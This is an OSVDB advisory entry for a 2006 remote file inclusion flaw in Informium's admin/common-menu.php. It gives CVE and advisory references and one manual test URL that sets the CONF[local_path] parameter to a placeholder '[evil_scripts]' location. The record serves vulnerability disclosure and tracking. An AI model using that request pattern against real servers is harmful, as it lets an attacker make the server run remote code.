Informium common-menu.php CONF[local_path] Variable Remote File Inclusion

2006-06-02T09:35:15
ID OSVDB:25988
Type osvdb
Reporter OSVDB
Modified 2006-06-02T09:35:15

Description

Manual Testing Notes

http://[target]/[Informium_path]/admin/common-menu.php?CONF[local_path]=[evil_scripts]

References:

Vendor URL: http://sourceforge.net/project/showfiles.php?group_id=51190&release_id=100921
Secunia Advisory ID: 20448
Generic Exploit URL: http://milw0rm.com/exploits/1865
FrSIRT Advisory: ADV-2006-2131
CVE-2006-2818
Bugtraq ID: 18249